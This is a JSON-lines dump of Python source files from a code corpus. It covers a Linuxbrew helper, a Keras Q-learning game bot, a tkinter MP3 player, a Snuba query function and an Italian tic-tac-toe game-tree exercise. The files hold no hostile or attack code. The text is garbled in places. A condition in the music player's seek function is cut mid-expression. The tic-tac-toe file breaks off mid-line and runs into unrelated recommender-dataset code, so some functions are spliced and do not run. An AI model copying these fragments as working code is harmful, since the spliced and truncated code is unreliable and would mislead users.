g_build_root\n g_build_root = build_root\n\n\ndef get_linuxbrew_dir():\n if not sys.platform.startswith('linux'):\n return None\n\n global g_linuxbrew_dir\n if not g_linuxbrew_dir:\n g_linuxbrew_dir = LinuxbrewHome(g_build_root).linuxbrew_dir\n return g_linuxbrew_dir\n","sub_path":"python/yb/linuxbrew.py","file_name":"linuxbrew.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"107371103","text":"import numpy as np\nfrom time import time\nfrom keras.layers import InputLayer, Dense\nfrom keras.models import Sequential\n\nfrom .state_controller import StateController\nfrom .deep_ql_controller import DeepQLController\n\nfrom ..sprites.obstacle import Obstacle\nfrom ..sprites.point import Point\n\nfrom ..utils.utils import get_rot_mat\n\nclass TrainedDQLController(StateController):\n\n # Available actions\n avail_actions = ['turn_left', 'turn_right', 'move_left', 'move_right', 'move_forw', 'move_back', 'shoot', 'still']\n\n # Variables given to the learner\n state_vars = ['pos_x', 'pos_y', 'rot', 'health', 'closest_enemy_direction', 'closest_enemy_dist', 'is_closest_enemy_visible',\n 'closest_proj_x', 'closest_proj_y', 'closest_proj_dot', 'obs_in_front', 'obs_on_right', 'obs_on_left']\n\n\n def __init__(self, team, game, position=None, rotation=None, model=None):\n super(TrainedDQLController, self).__init__(team,game,position,rotation)\n\n self.train_err = []\n\n if model == None:\n self.init_q_funct()\n else:\n self.q_func = model\n\n\n\n def init_q_funct(self):\n # Number of network inputs\n # The variables of the state we will get\n n_inputs = len(self.state_vars)\n\n # Number of network outputs\n n_outputs = len(self.avail_actions)\n\n model = Sequential()\n model.add(InputLayer((n_inputs,)))\n model.add(Dense(32, activation='relu'))\n model.add(Dense(32, activation='relu'))\n model.add(Dense(32, activation='tanh'))\n model.add(Dense(n_outputs, activation='linear'))\n\n model.compile(optimizer='Adam', loss='mse')\n\n self.q_func = model\n\n\n def take_action(self):\n super(TrainedDQLController, self).take_action()\n \n curr_state = self.get_env_state()\n curr_state = np.reshape(curr_state, (1, len(curr_state)))\n\n action_vals = self.extract_actions()\n action_vals = np.reshape(action_vals, (1, len(action_vals)))\n\n hist = self.q_func.fit(curr_state, action_vals, epochs=1, verbose=0)\n\n self.train_err.extend(hist.history['loss'])\n\n\n def extract_actions(self):\n l_turn = 1 if self.get_ang_speed() == -1 else 0\n r_turn = 1 if self.get_ang_speed() == 1 else 0\n\n half = np.sqrt(2)\n\n l_move = 1 if self.get_speed()[0] < -half else 0\n r_move = 1 if self.get_speed()[0] >= half else 0\n\n f_move = 1 if self.get_speed()[1] >= half else 0\n b_move = 1 if self.get_speed()[1] < -half else 0\n\n shoot = 1 if self.current_state == 'Shoot' else 0\n\n still = 1 if l_move == r_move == f_move == b_move == shoot == 0 else 0\n\n actions = np.array([l_turn, r_turn, l_move, r_move, f_move, b_move, shoot, still])\n\n # Choose a random action with value 1 and set it as active, set the rest to zero\n rand_id = np.random.choice(np.arange(len(actions))[actions==1])\n\n ret_actions = np.zeros(len(actions))\n ret_actions[rand_id] = 1\n\n return ret_actions\n\n def get_env_state(self):\n scr_height, scr_width = self.game.window_size\n opp_id = np.argmin([np.linalg.norm(self.get_position() - x.get_position()) for x in self.get_opponents()])\n opponent = self.get_opponents()[opp_id]\n\n # Compute the state vars\n x = self.get_position()[0] / scr_width\n y = self.get_position()[1] / scr_height\n rot = self.get_rotation() / (2*np.pi)\n health = self.health / self.MAX_HEALTH\n\n vect_dist = opponent.get_position() - self.get_position()\n opp_dist = np.linalg.norm(vect_dist) / np.linalg.norm([scr_width, scr_height])\n opp_dir = np.arctan2(vect_dist[1], vect_dist[0])\n opp_dir = (-opp_dir + np.pi / 2) % (np.pi * 2) / (np.pi * 2)\n\n opp_visible = 1 if self.is_target_visible(opponent) else 0\n proj = self.get_closest_enemy_projectile()\n\n if proj is None:\n proj_x = -1\n proj_y = -1\n proj_dot = 0\n else:\n\n proj_x = proj.get_position()[0] / scr_width\n proj_y = proj.get_position()[1] / scr_height\n\n dir_vec = self.get_position() - proj.get_position()\n\n proj_speed = np.asarray(proj.get_speed() * get_rot_mat(proj.get_rotation())).flatten()\n\n proj_dot = np.dot(proj_speed, dir_vec / np.linalg.norm(dir_vec))/2 + 0.5\n\n # Get obstacles around\n # Create a point in front, one on the right and one on the left\n\n rel_pos_front = np.array([0, self.RADIUS * 4])\n rel_pos_right = np.array([self.RADIUS * 4, 0])\n rel_pos_left = np.array([-self.RADIUS * 4, 0])\n\n all_pos = np.vstack([rel_pos_front, rel_pos_right, rel_pos_left])\n\n rel_rot_pos = np.asarray(all_pos * get_rot_mat(self.get_rotation()))\n\n point_front = Point(self.get_position() + rel_rot_pos[0, :])\n point_right = Point(self.get_position() + rel_rot_pos[1, :])\n point_left = Point(self.get_position() + rel_rot_pos[2, :])\n\n obs_front = 1 if self.game.collides_with(point_front, 'obstacle') else 0\n\n obs_right = 1 if self.game.collides_with(point_right, 'obstacle') else 0\n\n obs_left = 1 if self.game.collides_with(point_left, 'obstacle') else 0\n\n state = np.array([x, y, rot, health, opp_dist, opp_dir, opp_visible, proj_x, proj_y, proj_dot, obs_front, obs_right, obs_left])\n\n return state\n\n def save_model(self, name):\n self.q_func.save('deep_q_models/{}.h5'.format(name))\n\n def get_bot_type(self):\n return 'Deep QL Controller'","sub_path":"project/ai/trained_dql_controller.py","file_name":"trained_dql_controller.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"448220828","text":"# all imports\r\nimport os\r\nimport threading\r\nimport time\r\nimport tkinter.messagebox\r\nfrom tkinter import *\r\nfrom tkinter import filedialog\r\nfrom tkinter import ttk\r\nfrom ttkthemes import themed_tk as tk\r\nfrom mutagen.mp3 import MP3\r\nfrom pygame import mixer\r\nfrom mutagen.easyid3 import EasyID3\r\nfrom re import sub\r\n# Global variables\r\nqueue = []\r\nmuted = FALSE\r\npaused = FALSE\r\nfilename_path=\"\"\r\nplay_song=\"\"\r\ncurrent_time=0\r\nt1=''\r\nclose=False\r\ntotal_length=10\r\nselected=0\r\ni=0\r\nabm=\"\"\r\nnextmusic=0\r\nfile='playlist/all.txt'\r\n#initializing window \r\nroot = tk.ThemedTk()\r\nroot.get_themes()# Returns a list of all themes that can be set\r\nroot.set_theme(\"breeze\") # Sets an available theme\r\nroot.geometry('585x400+200+200') # window geometry\r\nroot.title(\"SUR MPlayer\")\r\nroot.iconbitmap(r'images/sur.ico')\r\nmixer.init() # initializing the mixer\r\n\r\n# functions\r\ndef on_closing():\r\n global paused\r\n global close\r\n paused = True\r\n close=True\r\n stop_music()\r\n root.destroy()\r\n \r\ndef pause_music():\r\n global paused\r\n paused = TRUE\r\n mixer.music.pause()\r\n statusbar['text'] = \"Music Paused\"\r\ndef rewind_music():\r\n global current_time\r\n global selected\r\n if current_time<=7:\r\n if selected==0:\r\n play_music()\r\n else:\r\n playlistbox.selection_clear(0, tkinter.END)\r\n playlistbox.select_set(selected-1)\r\n play_music()\r\n else:\r\n play_music()\r\n statusbar['text'] = \"Music Rewinded\"\r\n\r\ndef set_vol(val):\r\n \r\n volume = round(float(val),0)\r\n lowvol['text']=volume\r\n volume=volume / 100\r\n mixer.music.set_volume(volume)\r\n \r\ndef seek_play(val):\r\n global current_time\r\n global play_song\r\n val=int(round(float(val)))\r\n if val>current_time+2 or val2:\r\n current_time=total_length+10\r\n nextmusic=0\r\n else:\r\n mixer.music.stop()\r\n current_time+=10\r\n mixer.music.play(loops=0, start=current_time)\r\n nextmusic+=1\r\n print(nextmusic-1)\r\n \r\n\r\ndef del_song():\r\n global filename_path\r\n global queue\r\n global file\r\n try:\r\n selected_song = playlistbox.curselection()\r\n selected_song = int(selected_song[0])\r\n f=open(file,'r')\r\n c=open('playlist/all1.txt','a')\r\n var=f.read()\r\n for lines in var.split('\\n'):\r\n if lines!=queue[selected_song]:\r\n if lines!=\"\":\r\n c.write(lines+\"\\n\")\r\n f.close()\r\n c.close()\r\n os.remove(file)\r\n os.rename('playlist/all1.txt',file)\r\n \r\n playlistbox.delete(selected_song)\r\n queue.pop(selected_song)\r\n tkinter.messagebox.showinfo('Info','Deletion sucessfull')\r\n except:\r\n tkinter.messagebox.showerror('Error','Please Select A song from list to remove song')\r\n\r\n\r\ndef moreabt_song():\r\n global abm\r\n global abtm\r\n global play_it\r\n selected_song = playlistbox.curselection()\r\n if not selected_song:\r\n tkinter.messagebox.showerror('Error','Please Select A song from list to display about song')\r\n else:\r\n selected_song = int(selected_song[0])\r\n play_it = queue[selected_song]\r\n try:\r\n abtmusic = EasyID3(play_it)\r\n filename = abtmusic['title'][0]\r\n abtm=tk.ThemedTk()\r\n abtm.geometry('300x280+200+200')\r\n abtm.title(\"About ~~ \"+filename)\r\n abtm.iconbitmap(r'images/sur.ico')\r\n abm=Listbox(abtm,width=50,height=15)\r\n abm.place(x=0,y=0)\r\n for key in sorted(abtmusic.keys()):\r\n val = abtmusic[key]\r\n abm.insert(END,key+\" : \"+val[0])\r\n editBtn = ttk.Button(abtm,text=\"Edit Data\" ,command=ed_gui)\r\n editBtn.place(x=10,y=250)\r\n except:\r\n tkinter.messagebox.showerror('File not found', 'play the song to get info')\r\n\r\ndef ed_gui():\r\n global abm\r\n global abtm\r\n global play_it\r\n global selected_song\r\n global entry_edval\r\n def edit_save():\r\n abtmusic = EasyID3(play_it)\r\n try:\r\n abtmusic[selected_song]==str(entry_edval.get())\r\n abtmusic.save()\r\n except:\r\n tkinter.messagebox.showerror('Error in Saving','Saving cannot be completed as\\n 1)Your windows is trying to interfere the program as an security threats\\n2) Your Anitvirus is trying to interfere the program as an security threats\\n3)Sorry nothing can be done for that ')\r\n eabtm.destroy()\r\n selected_song=abm.curselection()\r\n if not selected_song:\r\n tkinter.messagebox.showerror('Error','Please Select A song from list to display about song')\r\n selected_song = int(selected_song[0])\r\n abtmusic = EasyID3(play_it)\r\n l1=list(abtmusic.keys())\r\n l1=sorted(l1)\r\n selected_song=l1[selected_song]\r\n eabtm=tk.ThemedTk()\r\n eabtm.geometry('300x100+200+200')\r\n eabtm.title(\"Edit Value\")\r\n title = ttk.Label(eabtm, text=selected_song)\r\n title.pack()\r\n entry_edval=ttk.Entry(eabtm,)\r\n entry_edval.pack()\r\n saveBtn = ttk.Button(eabtm,text=\"SAVE\" ,command=edit_save)\r\n saveBtn.pack()\r\n abtm.destroy()\r\n \r\ndef about_us():\r\n tkinter.messagebox.showinfo('About SUR','This is an open Source Music player build using Python Tkinter by \\nSHUBHAM KOTHARI\\nANIKET KURKUTE\\nATUL GADEKAR')\r\n\r\ndef browse_file():\r\n global filename_path\r\n global queue\r\n global file\r\n def add_to_q():\r\n global queue\r\n add_to_playlist(filename_path)\r\n mixer.music.queue(filename_path)\r\n if filename_path==\"\":\r\n filename_path = filedialog.askopenfilename()\r\n if filename_path!=\"\":\r\n f=open(file,'a')\r\n f.write(filename_path+\"\\n\")\r\n f.close()\r\n add_to_q()\r\n else:\r\n add_to_q()\r\n filename_path=\"\"\r\n\r\ndef add_to_playlist(filename):\r\n global queue\r\n file_data = os.path.splitext(filename)\r\n if file_data[1] == '.mp3':\r\n abtmusic = EasyID3(filename_path)\r\n filename = abtmusic['title'][0]\r\n else:\r\n filename = os.path.basename(filename)\r\n playlistbox.insert(END, filename)\r\n queue.append(filename_path)\r\n playlistbox.config(yscrollcommand=scrollbar.set)\r\n scrollbar.config(command=playlistbox.yview)\r\ndef open_lyrics():\r\n play_it=''\r\n def edit_lyrics():\r\n def save_lyrics():\r\n val=display_label.get(1.0,END)\r\n play_it = queue[selected_song]\r\n abtmusic = EasyID3(play_it)\r\n var=abtmusic['title'][0]\r\n f=open(\"lyrics/\"+var+\".txt\",'a')\r\n f.write(val)\r\n f.close()\r\n eabtm.destroy()\r\n open_lyrics()\r\n global display_label\r\n eabtm=tk.ThemedTk()\r\n eabtm.geometry('450x400+200+200')\r\n eabtm.title(\"ADD LYRICS\")\r\n title = ttk.Label(eabtm, text=\"To Add Lyrics Copy Lyrics From Internet And Paste In Below text area\")\r\n title.pack()\r\n display_label = Text(eabtm, width=50,height=20, font=\"ariel\", fg=\"black\", bg=\"white\")\r\n display_label.pack()\r\n saveBtn = ttk.Button(eabtm,text=\"Save\",command=save_lyrics)\r\n saveBtn.pack()\r\n lyrm.destroy()\r\n selected_song = playlistbox.curselection()\r\n if not selected_song:\r\n tkinter.messagebox.showerror('Error','Please Select A song from list to display about song')\r\n else:\r\n selected_song = int(selected_song[0])\r\n play_it = queue[selected_song]\r\n abtmusic = EasyID3(play_it)\r\n var=abtmusic['title'][0]\r\n lyrm=tk.ThemedTk()\r\n lyrm.title('LYRICS ~~'+var)\r\n lyrm.geometry('590x280+200+200')\r\n lyrm.iconbitmap(r'images/sur.ico')\r\n abm=Listbox(lyrm,width=100,height=15)\r\n abm.place(x=0,y=0)\r\n LYscrollbar = Scrollbar(lyrm)\r\n LYscrollbar.pack(side=RIGHT,fill=Y)\r\n try:\r\n f=open(\"lyrics/\"+var+\".txt\",'r')\r\n for x in f:\r\n abm.insert(END,x.split())\r\n f.close()\r\n abm.config(yscrollcommand=LYscrollbar.set)\r\n LYscrollbar.config(command=abm.yview)\r\n except:\r\n abm.insert(END,\"no lyrics\")\r\n editBtn = ttk.Button(lyrm,text=\"Edit Data\",command=edit_lyrics)\r\n editBtn.place(x=10,y=250)\r\n\r\ndef avplaylist(): \r\n path = 'playlist/.'\r\n allplaylist=[]\r\n def add_playlist():\r\n def create_playlist():\r\n name=entry_edval.get()\r\n if name==\"\":\r\n tkinter.messagebox.showerror('Error','Name Is Not Valid')\r\n else:\r\n f=open('playlist/'+name+'.txt','a')\r\n tkinter.messagebox.showinfo('Info','Playlist created sucessfully')\r\n f.close()\r\n edwin.destroy()\r\n avplaylist()\r\n edwin=tk.ThemedTk()\r\n edwin.geometry('300x100+200+200')\r\n edwin.title(\"Edit Value\")\r\n title = ttk.Label(edwin, text='Enter name for playlist')\r\n title.pack()\r\n entry_edval=ttk.Entry(edwin,)\r\n entry_edval.pack()\r\n saveBtn = ttk.Button(edwin,text=\"SAVE\",command=create_playlist)\r\n saveBtn.pack()\r\n avplaylistgui.destroy()\r\n def play_playlist():\r\n global file\r\n global current_time\r\n global total_length\r\n global queue\r\n try:\r\n selected_playlist = avplaylist_listbox.curselection()\r\n selected_playlist = int(selected_playlist[0])\r\n play_it = allplaylist[selected_playlist]\r\n mixer.music.stop()\r\n playlistbox.delete(0,tkinter.END)\r\n queue.clear()\r\n file=play_it\r\n on_start(play_it)\r\n playlistbox.select_set(0)\r\n if not queue:\r\n titletxt['text']='No title'\r\n albumtxt['text']='No album'\r\n artisttxt['text']='No artist'\r\n else: \r\n play_music()\r\n avplaylistgui.destroy()\r\n except:\r\n tkinter.messagebox.showerror('Error','Please Select A Playlist from list to play it')\r\n avplaylistgui=tk.ThemedTk()\r\n avplaylistgui.title('ALL PLAYLISTS')\r\n avplaylistgui.geometry('280x280+200+200')\r\n avplaylistgui.iconbitmap(r'images/sur.ico')\r\n avplaylist_listbox=Listbox(avplaylistgui,width=100,height=15)\r\n avplaylist_listbox.place(x=0,y=0)\r\n addBtn = ttk.Button(avplaylistgui,text=\"Add Playlist\",command=add_playlist)\r\n addBtn.place(x=10,y=250)\r\n playplaylistBtn = ttk.Button(avplaylistgui,text=\"Play Playlist\",command=play_playlist)\r\n playplaylistBtn.place(x=90,y=250)\r\n files = os.listdir(path)\r\n for name in files:\r\n allplaylist.append(\"playlist/\"+name)\r\n name=name.split('.')\r\n avplaylist_listbox.insert(END,name[0])\r\n\r\n\r\ndef on_start(file='playlist/all.txt'):\r\n global filename_path\r\n f=open(file,'r')\r\n for x in f:\r\n filename_path=x.strip()\r\n browse_file()\r\n filename_path=\"\"\r\n f.close()\r\n\r\ndef main_thread():\r\n global queue\r\n global close\r\n global current_time\r\n global total_length\r\n global selected\r\n while close==False:\r\n i=0\r\n if current_time+3>total_length:\r\n if selected==len(queue)-1:\r\n i=0-selected\r\n playlistbox.selection_clear(0, tkinter.END)\r\n playlistbox.select_set(0)\r\n else: \r\n i=1+selected\r\n playlistbox.selection_clear(0, tkinter.END)\r\n playlistbox.select_set(i)\r\n stop_music()\r\n play_music()\r\n else:\r\n continue\r\n print(\"break\")\r\n\r\n \r\n\r\n# menu bar\r\nmenubar = Menu(root)\r\nroot.config(menu=menubar)\r\nsubMenu = Menu(menubar, tearoff=0)\r\nmenubar.add_cascade(label=\"File\", menu=subMenu)\r\nsubMenu.add_command(label=\"Open\", command=browse_file)\r\nsubMenu.add_command(label=\"Exit\", command=root.destroy)\r\nsubMenu = Menu(menubar, tearoff=0)\r\nmenubar.add_cascade(label=\"Help\", menu=subMenu)\r\nsubMenu.add_command(label=\"About Us\", command=about_us)\r\n# widgets\r\nplaylistbox = Listbox(root,yscrollcommand='yes',width=78)\r\nplaylistbox.place(x=10,y=10)\r\nscrollbar = Scrollbar(root)\r\nscrollbar.pack(side=RIGHT,fill=Y)\r\nmoreBtn = ttk.Button(root, text=\"More About Song\", command=moreabt_song)\r\nmoreBtn.place(x=25,y=190)\r\nlyricsBtn = ttk.Button(root, text=\"LYRICS\", command=open_lyrics)\r\nlyricsBtn.place(x=155,y=190)\r\naddBtn = ttk.Button(root, text=\"+ Add\", command=browse_file)\r\naddBtn.place(x=255,y=190)\r\ndelBtn = ttk.Button(root, text=\"- Remove\", command=del_song)\r\ndelBtn.place(x=355,y=190)\r\nplaylistBtn = ttk.Button(root, text=\"Playlist\", command=avplaylist)\r\nplaylistBtn.place(x=455,y=190)\r\ntitlelab= ttk.Label(root, text=\"Title : \",font='Times 12 bold')\r\ntitlelab.place(x=10,y=225)\r\ntitletxt= ttk.Label(root, text=\"No Title\",font='Times 12 bold')\r\ntitletxt.place(x=55,y=225)\r\nalbumlab= ttk.Label(root, text=\"Album : \",font='Times 11')\r\nalbumlab.place(x=10,y=245)\r\nalbumtxt= ttk.Label(root, text=\"No Album\",font='Times 11')\r\nalbumtxt.place(x=60,y=245)\r\nartistlab= ttk.Label(root, text=\"Artist : \",font='Times 11')\r\nartistlab.place(x=10,y=265)\r\nartisttxt= ttk.Label(root, text=\"No Artist\",font='Times 11')\r\nartisttxt.place(x=55,y=265)\r\ncurrenttimelabel = ttk.Label(root, text='--:--')\r\ncurrenttimelabel.place(x=2,y=285)\r\nplay_scale = ttk.Scale(root, from_=0, to=100, orient=HORIZONTAL,length=500,command=seek_play)\r\nplay_scale.place(x=35,y=285)\r\nlengthlabel = ttk.Label(root, text='--:--')\r\nlengthlabel.place(x=538,y=285)\r\nprevPhoto = PhotoImage(file='images/previous.png').subsample(3,3)\r\nprevBtn = ttk.Button(root, image=prevPhoto, command=rewind_music)\r\nprevBtn.place(x=10,y=315)\r\nplayPhoto = PhotoImage(file='images/play.png').subsample(2,2)\r\nplayBtn = ttk.Button(root, image=playPhoto, command=play_music)\r\nplayBtn.place(x=60,y=310)\r\npausePhoto = PhotoImage(file='images/pause.png').subsample(2,2)\r\npauseBtn = ttk.Button(root, image=pausePhoto, command=pause_music)\r\npauseBtn.place(x=120,y=310)\r\nnextPhoto = PhotoImage(file='images/next.png').subsample(3,3)\r\nnextBtn = ttk.Button(root, image=nextPhoto, command=next_music)\r\nnextBtn.place(x=180,y=315)\r\nstopPhoto = PhotoImage(file='images/stop.png').subsample(3,3)\r\nstopBtn = ttk.Button(root, image=stopPhoto, command=stop_music)\r\nstopBtn.place(x=230,y=315)\r\nmutePhoto = PhotoImage(file='images/mute.png').subsample(2,2)\r\nvolumePhoto = PhotoImage(file='images/volume.png').subsample(2,2)\r\nvolumeBtn = ttk.Button(root, image=volumePhoto, command=mute_music)\r\nvolumeBtn.place(x=380,y=320)\r\nlowvol = ttk.Label(root, text=\"0\")\r\nlowvol.place(x=420,y=325)\r\nvolscale = ttk.Scale(root, from_=0, to=100, orient=HORIZONTAL, command=set_vol)\r\nvolscale.set(70)\r\nset_vol('70') # implement the default value of scale when music player starts\r\nmixer.music.set_volume(0.7)\r\nvolscale.place(x=445,y=325)\r\nhighvol = ttk.Label(root, text=\"100\")\r\nhighvol.place(x=545,y=325)\r\n\r\n# status bar\r\nstatusbar = ttk.Label(root, text=\"Welcome to SUR MPlayer\", relief=SUNKEN, anchor=W, font='Times 10 italic')\r\nstatusbar.pack(side=BOTTOM, fill=X)\r\n\r\n# end\r\nroot.protocol(\"WM_DELETE_WINDOW\", on_closing)\r\non_start()\r\ntm = threading.Thread(target=main_thread,)\r\ntm.start()\r\nroot.mainloop()\r\n","sub_path":"main -.py","file_name":"main -.py","file_ext":"py","file_size_in_byte":18675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"116422211","text":"def query(start, end, groupby, conditions=None, filter_keys=None, aggregations=None, rollup=None, arrayjoin=None, limit=None, orderby=None):\n '\\n Sends a query to snuba.\\n\\n `conditions`: A list of (column, operator, literal) conditions to be passed\\n to the query. Conditions that we know will not have to be translated should\\n be passed this way (eg tag[foo] = bar).\\n\\n `filter_keys`: A dictionary of {col: [key, ...]} that will be converted\\n into \"col IN (key, ...)\" conditions. These are used to restrict the query to\\n known sets of project/issue/environment/release etc. Appropriate\\n translations (eg. from environment model ID to environment name) are\\n performed on the query, and the inverse translation performed on the\\n result. The project_id(s) to restrict the query to will also be\\n automatically inferred from these keys.\\n\\n `aggregations` a list of (aggregation_function, column, alias) tuples to be\\n passed to the query.\\n '\n groupby = (groupby or [])\n conditions = (conditions or [])\n aggregations = (aggregations or [['count()', '', 'aggregate']])\n filter_keys = (filter_keys or {\n \n })\n snuba_map = {col: get_snuba_map(col, keys) for (col, keys) in six.iteritems(filter_keys)}\n snuba_map = {k: v for (k, v) in six.iteritems(snuba_map) if ((k is not None) and (v is not None))}\n rev_snuba_map = {col: dict((reversed(i) for i in keys.items())) for (col, keys) in six.iteritems(snuba_map)}\n for (col, keys) in six.iteritems(filter_keys):\n keys = [k for k in keys if (k is not None)]\n if (col in snuba_map):\n keys = [snuba_map[col][k] for k in keys if (k in snuba_map[col])]\n if keys:\n conditions.append((col, 'IN', keys))\n if ('project_id' in filter_keys):\n project_ids = filter_keys['project_id']\n elif filter_keys:\n ids = [get_related_project_ids(k, filter_keys[k]) for k in filter_keys]\n project_ids = list(set.union(*map(set, ids)))\n else:\n project_ids = []\n if (not project_ids):\n raise SnubaError('No project_id filter, or none could be inferred from other filters.')\n aggregate_cols = [a[1] for a in aggregations]\n condition_cols = [c[0] for c in flat_conditions(conditions)]\n all_cols = ((groupby + aggregate_cols) + condition_cols)\n get_issues = ('issue' in all_cols)\n issues = (get_project_issues(project_ids, filter_keys.get('issue')) if get_issues else None)\n url = '{0}/query'.format(SNUBA)\n request = {k: v for (k, v) in six.iteritems({\n 'from_date': start.isoformat(),\n 'to_date': end.isoformat(),\n 'conditions': conditions,\n 'groupby': groupby,\n 'project': project_ids,\n 'aggregations': aggregations,\n 'granularity': rollup,\n 'issues': issues,\n 'arrayjoin': arrayjoin,\n 'limit': limit,\n 'orderby': orderby,\n }) if (v is not None)}\n try:\n response = requests.post(url, data=json.dumps(request))\n response.raise_for_status()\n except requests.RequestException as re:\n raise SnubaError(re)\n try:\n response = json.loads(response.text)\n except ValueError:\n raise SnubaError('Could not decode JSON response: {}'.format(response.text))\n aggregate_cols = [a[2] for a in aggregations]\n expected_cols = set((groupby + aggregate_cols))\n got_cols = set((c['name'] for c in response['meta']))\n assert (expected_cols == got_cols)\n for d in response['data']:\n if ('time' in d):\n d['time'] = int(to_timestamp(parse_datetime(d['time'])))\n for col in rev_snuba_map:\n if (col in d):\n d[col] = rev_snuba_map[col][d[col]]\n return nest_groups(response['data'], groupby, aggregate_cols)","sub_path":"Data Set/bug-fixing-5/65a51c4c5777ee4f06c25775bea4bd66bc8a461b--fix.py","file_name":"65a51c4c5777ee4f06c25775bea4bd66bc8a461b--fix.py","file_ext":"py","file_size_in_byte":3788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"250116438","text":"'''\nIl tris e' un popolarissimo gioco. Si gioca su una griglia quadrata di 3×3 caselle.\nA turno, i due giocatori scelgono una cella vuota e vi disegnano il proprio simbolo \n(un giocatore ha come simbolo una \"o\" e l'avversario una 'x'). \nVince il giocatore che riesce a disporre tre dei propri simboli in linea retta \norizzontale, verticale o diagonale. Se la griglia viene riempita \nsenza che nessuno dei giocatori sia riuscito a completare una linea \nretta di tre simboli, il gioco finisce in parità. Nel caso in cui il gioco \nfinisse in parità, la partita è detta \"patta\". \nPer convenzione a griglia vuota la prima mossa spetta sempre al giocatore 'o'\n\nUna configurazione del gioco e' dunque univocamente determinata dal contenuto della griglia.\n\nNel seguito assumiamo che il contenuto della griglia sia rappresentato tramite lista di liste.\nLa dimensione della lista di liste M e' 3x3 ed M[i][j] contiene '', 'x', o 'o' a seconda \nche la cella della griglia appartenente all'iesima riga e j-ma colonna sia ancora libera, \ncontenga il simbolo 'x' o contenga il simbolo 'o'. \n\nData una configurazione C del gioco, l'albero di gioco per C e' l'albero che \nsi ottiene ricorsivamente partendo dalla configurazione C e assegnando come figli le configurazioni \nche e' possibile ottenere da C con una mossa ulteriore del gioco. Ovviamente risulteranno \nfoglie dell'albero i possibili esiti della partita vale a dire le diverse configurazioni cui e' \npossibile arrivare partendo da C e che rappresentano patte, vittorie per 'o' o vittorie per 'x'.\nSe veda ad esempio l'immagine albero_di_gioco.png che mostra l' albero di gioco che si ottiene a partire \ndalla configurazione rappresentata da [['x', 'o', 'o'], ['x', 'x', 'o'], ['', '', '']]\n \n\nSi consideri la seguente Classe di oggetti:\n\n\nclass NodoTris:\n def __init__(self, griglia):\n self.nome = griglia\n self.lista_figli = [] \n\n\nBisogna progettare le seguente funzione \n\ngen_tree(griglia)\nche, data la configurazione di gioco griglia, costruisce l'albero di gioco che si ottiene a partire \ndalla configurazione griglia e ne restituisce la radice. I nodi dell'albero devono essere \noggetti della classe NodoTris.\n\nPer testare la correttezza della vostra implementazione di gen_tree() il grade utilizzera' quattro metodi \ndella classe NodoTris che dovete comunque implementare: \n\n1)\ntipo(self)\nche, dato un nodo NodoTris, restituisce:\n 'o' se la configurazione rappresentata dal nodo e' una configurazione di vittoria per il giocatore 'o'\n 'x' se la configurazione rappresentata dal nodo e' una configurazione di vittoria per il giocatore 'x'\n '-' se la configurazione rappresentata dal nodo e' una configurazione di patta\n '?' se la configurazione rappresentata dal nodo e' una configurazione di gioco non ancora terminato\n\n2)\nesiti(self)\nche, dato un nodo radice di un albero di gioco, restituisce una tripla con i possibili \nesiti della partita che ha come configurazione iniziale quella rappresentata dal nodo. \nPiu' precisamente: il primo elemento della tripla è il numero di patte possibili, \nil secondo è il numero di possibili vittorie per il giocatore 'o' mentre il terzo elemento \ne' il numero di possibili vittorie per il giocatore 'x'.\n\n3)\nvittorie_livello(self, giocatore, h)\nche, dato un nodo radice di un albero di gioco, uno dei due giocatori ed un intero h,\nrestituisce il numero di nodi che rappresentano una vittoria per il giocatore e si \ntrovano ad altezza h nell'albero. In altri termini restituisce il numero di vittorie possibili \nper giocatore in esattamente h mosse, nella partita che ha come configurazione iniziale \nquella rappresentata dalla radice dell'albero.\n\n4)\nstrategia_vincente(self,giocatore)\nche, dato un nodo radice di un albero di gioco ed uno dei due giocatori, restituisce True o False. \nRestituisce True se giocatore ha una strategia vincente nella partita \nche ha come configurazione iniziale quella rappresentata dal nodo radice, False altrimenti.\n\nNota che un giocatore ha una strategia vincente rispetto ad una certa configurazione se, \nqualunque siano le mosse dell'avversario ha sempre la possibilita' di rispondere in modo \nche la partita termini con la sua vittoria.\n\nPotete ovviamente definire ulteriori funzioni e altri metodi per la Classe NodiTris \nse li ritenete utili al fine della risoluzione del compito.\n\nPotete assumere che le configurazioni di gioco rappresentate da griglia siano sempre configurazioni \nlecite (vale a dire ottenute dopo un certo numero di mosse a parire dalla griglia vuota).\n\n\nAVVERTENZE: non usare caratteri non ASCII, come le lettere accentate; non\nimportare moduli che non sono nella libreria standard.\n\nATTENZIONE: i test vengono eseguiti con un timeout globale di 2*N secondi (se il grader esegue N test).\n'''\nfrom copy import deepcopy\n\n\ndef trova_esiti(radice,lista):\n if radice.situazione=='-':lista[0]+=1\n elif radice.situazione=='o':lista[1]+=1\n elif radice.situazione=='x':lista[2]+=1\n else:\n for r in radice.lista_figli:\n trova_esiti(r,lista)\n\n\ndef trova_vittorie_livello(radice,g,h,lista):\n if radice.livello0:\r\n #self.AVAILABLE_ICM = ICM_dictionary\r\n # self.AVAILABLE_ICM_feature_mapper = ICM_feature_mapper_dictionary\r\n # self._HAS_ICM = True\r\n\r\n \r\n def get_dataset_name(self):\r\n return self.DATASET_NAME\r\n\r\n def get_urm_train(self) :\r\n return self.URM_train_av.copy()\r\n \r\n def get_urm_validation(self) :\r\n return self.URM_validation_av.copy()\r\n \r\n def get_urm_test(self) :\r\n return self.URM_test_av.copy()\r\n\r\n #def get_icm(self) :\r\n # return self.AVAILABLE_ICM.copy()\r\n\r\n\r\n\r\n #########################################################################################################\r\n ########## ##########\r\n ########## LOAD AND SAVE ##########\r\n ########## ##########\r\n #########################################################################################################\r\n\r\n def save_data(self, save_folder_path):\r\n\r\n dataIO = DataIO(folder_path = save_folder_path)\r\n \r\n global_attributes_dict = {\r\n \"DATASET_NAME\": self.DATASET_NAME\r\n }\r\n\r\n dataIO.save_data(file_name = \"dataset_global_attributes\", data_dict_to_save = global_attributes_dict)\r\n\r\n dataIO.save_data(data_dict_to_save = self.URM_train_av, file_name = \"dataset_URM_train\")\r\n\r\n dataIO.save_data(data_dict_to_save = self.URM_validation_av, file_name = 